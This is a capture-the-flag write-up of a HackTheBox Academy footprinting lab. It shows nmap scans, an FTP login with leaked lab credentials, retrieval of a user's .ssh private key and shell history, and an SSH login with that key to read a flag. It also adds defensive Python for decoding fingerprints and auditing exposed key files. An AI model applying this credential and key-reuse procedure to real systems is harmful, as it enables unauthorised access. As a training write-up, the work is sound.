What follows is a writeup of the lab Footprinting Easy from the HackTheBox Academy.

Given scenario.

We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.

The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.

Additionally, our teammates have found the following credentials “ceil:qwer1234”, and they pointed out that some of the company’s employees were talking about SSH keys on a forum.

The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.

Reconnaissance

First, let’s probe the target machine with a SYN scan (a half-open scan: only the first two steps of the TCP handshake take place).
Limiting the scan to the 1000 most commonly used ports is fine for this lab.

$ nmap 10.129.59.20 -Pn -sS --top-ports=1000 -n --disable-arp-ping
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:31 CET
Nmap scan report for 10.129.59.20
Host is up (0.059s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
2121/tcp open  ccproxy-ftp

Now that we have a list of open ports, it’s time to see what versions of these well-known services are running.

Even though nmap cannot output a valid version for FTP on ports 21 and 2121, we can see from the appended service fingerprints that a ProFTPD server is running.

Of particular interest is the second fingerprint, which reveals the banner 220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20.
As we will see when connecting to FTP on port 2121, this service exposes the home directory of the user ceil.

$ nmap 10.129.59.20 -Pn -n -sV -p21,22,53,2121
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 22:32 CET
Stats: 0:01:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:21 remaining)
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:34 (0:00:23 remaining)
Nmap scan report for 10.129.59.20
Host is up (0.055s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp?
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
2121/tcp open  ftp
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,9B,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.htb
SF:\)\x20\[10\.129\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being
SF:\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20m
SF:ore\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8C,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\.1
SF:29\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
SF:ve\r\n");
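
The two fingerprints above can be decoded rather than read by eye, which also makes clear what each banner discloses (an internal hostname on port 21, a user's name on port 2121). The following is an added example, not part of the original writeup: it rejoins the wrapped SF: lines, undoes Nmap's escaping, and compares the decoded length with the hex length field; the function names are this example's own.

```python
import re

# Fingerprint lines copied verbatim from the scan output above.
RAW = r"""
SF-Port21-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,9B,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.htb
SF:\)\x20\[10\.129\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being
SF:\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20m
SF:ore\x20creative\r\n");
SF-Port2121-TCP:V=7.95%I=7%D=3/27%Time=67E5C415%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8C,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\.1
SF:29\.59\.20\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
SF:ve\r\n");
"""
PROBE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
ESC = re.compile(r"\\(x[0-9A-Fa-f]{2}|.)", re.S)
SIMPLE = {"r": "\r", "n": "\n", "t": "\t", "0": "\0"}

def unescape(data):
    # Undo the escaping: \xHH bytes, \r \n \t \0, and backslash-quoted punctuation.
    def repl(m):
        tok = m.group(1)
        return chr(int(tok[1:], 16)) if len(tok) == 3 else SIMPLE.get(tok, tok)
    return ESC.sub(repl, data)

def parse_fingerprints(raw):
    """Return {port: {probe: (declared_len, response)}} for each fingerprint in raw."""
    blobs = []
    for line in map(str.strip, raw.splitlines()):
        if line.startswith("SF-"):              # first line of a fingerprint
            blobs.append(line[3:])
        elif line.startswith("SF:") and blobs:  # wrapped line; may split an escape
            blobs[-1] += line[3:]
    return {int(re.match(r"Port(\d+)-", b).group(1)):
            {name: (int(hexlen, 16), unescape(data)) for name, hexlen, data in PROBE.findall(b)}
            for b in blobs}

def banner(raw, port, probe="GenericLines"):
    """First response line, plus whether the decoded length matches the declared one."""
    declared, response = parse_fingerprints(raw)[port][probe]
    return response.split("\r\n")[0], declared == len(response)

if __name__ == "__main__":
    for port in sorted(parse_fingerprints(RAW)):
        print(port, banner(RAW, port))
```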

FTP Enumeration

Once connected, we issue the command ls -la to list the contents of the directory, including hidden files and folders.
Among the hidden files and directories, we should inspect .bash_history to retrieve the latest commands used, and we must get a copy of the .ssh folder.

$ ftp ceil@10.129.59.20 -P2121
Connected to 10.129.59.20.
220 ProFTPD Server (Ceil's FTP) [10.129.59.20]
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||60164|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo

.bash_history content:

cat id_rsa.pub >> authorized_keys
cd ..
cd /home
cd ceil/
ls -l
ls -al
mkdir flag
cd flag/
touch flag.txt
vim flag.txt
cat flag.txt
ls -al
mv flag/flag.txt .

Endpoint landing

With the SSH identity file of the user ceil, we can now connect to the target machine and explore directories outside of the home directory.

Before connecting, the permissions on the id_rsa file must be restricted to read and write for the owner only, since this file is a private key.

$ chmod 600 id_rsa

$ ll
total 12
-rw-r--r-- 1 count_0_interrupt count_0_interrupt  738 Nov 10  2021 authorized_keys
-rw------- 1 count_0_interrupt count_0_interrupt 3381 Nov 10  2021 id_rsa
-rw-r--r-- 1 count_0_interrupt count_0_interrupt  738 Nov 10  2021 id_rsa.pub
$ ssh ceil@10.129.59.20 -i id_rsa
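
The finding behind the last two sections is a file service whose root is a user's home directory, private key and shell history included. The following is an added example, not part of the original writeup: a defender-side audit that walks such a directory, flags PEM private keys by content and history files by name, and reports whether each file has group/other permission bits set (the condition chmod 600 removes above). `classify`, `audit_tree`, `demo` and the sample tree are this example's own, and the file contents are constructed placeholders.

```python
import os
import stat
import tempfile

# Names taken from the FTP listing above; the labels are this example's own.
SENSITIVE_NAMES = {".bash_history": "shell history", ".viminfo": "editor history",
                   "authorized_keys": "SSH login key list"}

def classify(path):
    """Label a file as sensitive by content (PEM private key) or by name."""
    try:
        with open(path, "rb") as fh:
            first = fh.readline(128).strip()
    except OSError:
        first = b""  # unreadable to the auditor: fall back to the name check
    if first.startswith(b"-----BEGIN ") and first.endswith(b"PRIVATE KEY-----"):
        return "private key"
    return SENSITIVE_NAMES.get(os.path.basename(path))

def audit_tree(root):
    """Walk a directory that a file service exposes; return (relpath, label, too_open)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and (label := classify(path)):
                # Any group/other bit set: the OpenSSH client refuses such a key file.
                too_open = bool(stat.S_IMODE(os.stat(path).st_mode) & 0o077)
                findings.append((os.path.relpath(path, root), label, too_open))
    return sorted(findings)

def demo():
    """Build a constructed tree mirroring the listing (placeholder contents) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, ".ssh"))
        sample = {".bash_history": (b"ls -al\n", 0o600),
                  ".ssh/id_rsa": (b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n", 0o644),
                  ".ssh/id_rsa.pub": (b"ssh-rsa PLACEHOLDER ceil\n", 0o644)}
        for rel, (data, mode) in sample.items():
            path = os.path.join(root, rel)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return audit_tree(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Pointing `audit_tree` at the directory a file service actually serves shows what any authenticated user of that service can download.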

Data Exfiltration

Once inside the target machine, the flag is found in the home directory of the user flag.

ceil@NIXEASY:~$ ls /home/
ceil  cry0l1t3  flag
ceil@NIXEASY:/home$ cd flag/
ceil@NIXEASY:/home/flag$ ll
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10  2021 ./
drwxr-xr-x 5 root root 4096 Nov 10  2021 ../
-rw------- 1 ceil ceil   42 Nov 10  2021 .bash_history
-rw-r--r-- 1 ceil ceil  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25  2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15  2020 .cache/
-rw-rw-r-- 1 ceil ceil   61 Nov 10  2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15  2020 .local/
-rw-r--r-- 1 ceil ceil  807 Feb 25  2020 .profile
-rw-r--r-- 1 ceil ceil    0 Dec 15  2020 .sudo_as_admin_successful
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{x}